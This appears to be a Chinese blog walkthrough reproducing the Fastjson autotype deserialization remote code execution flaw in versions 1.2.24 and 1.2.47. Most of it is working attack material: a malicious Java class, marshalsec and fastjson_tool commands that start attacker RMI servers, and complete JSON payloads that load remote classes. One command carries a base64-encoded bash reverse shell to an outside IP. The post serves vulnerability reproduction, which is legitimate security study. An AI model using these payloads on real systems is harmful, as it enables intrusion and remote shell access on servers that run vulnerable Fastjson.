漏洞原理fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行漏洞产生。
漏洞利用漏洞利用需要我们在vps上启一个RMI服务并调用class文件(class文件为我们的恶意文件)
大概过程就是
生成恶意class文件
py开启web服务
然后开启rmi服务让受害者去调用我们恶意的class文件反序列化后达到命令执行的效果
fastjson 1.2.24
创建恶意的class文件 TouchFile.java 内容如下// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/success"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
javac TouchFile.java 将他编译成class文件
命令执行成功的话将在tmp文件下生成success文件
py启动一个web服务器
然后我们借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.classjava -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://yourip:8000/#/TouchFile" 9999
然后发送请求包加载我们的恶意class文件达到rce的效果POST / HTTP/1.1
Host: targetip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 162
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://yourip:9999/TouchFile",
"autoCommit":true
}
}
或者使用fastjson_tool.jar更加方便
反弹shell
运行RMI服务,加载恶意java类java -cp fastjson_tool.jar fastjson.HRMIServer rmi服务ip 9999 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"
发送反序列化代码漏洞执行命令python3 fastjson-1.2.47_rce.py http://targetip:8090 rmi://rmi ip:9999/Object
可以看到成功加载到我们恶意的class文件成功反弹shell
fastjson 1.2.47{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://rmi ip:9999/Exploit",
"autoCommit":true
}
}
也可以使用dnslog快速探测是否存在该漏洞
如果觉得《rmi远程代码执行漏洞_fastjson远程代码执行漏洞复现》对你有帮助,请点赞、收藏,并留下你的观点哦!
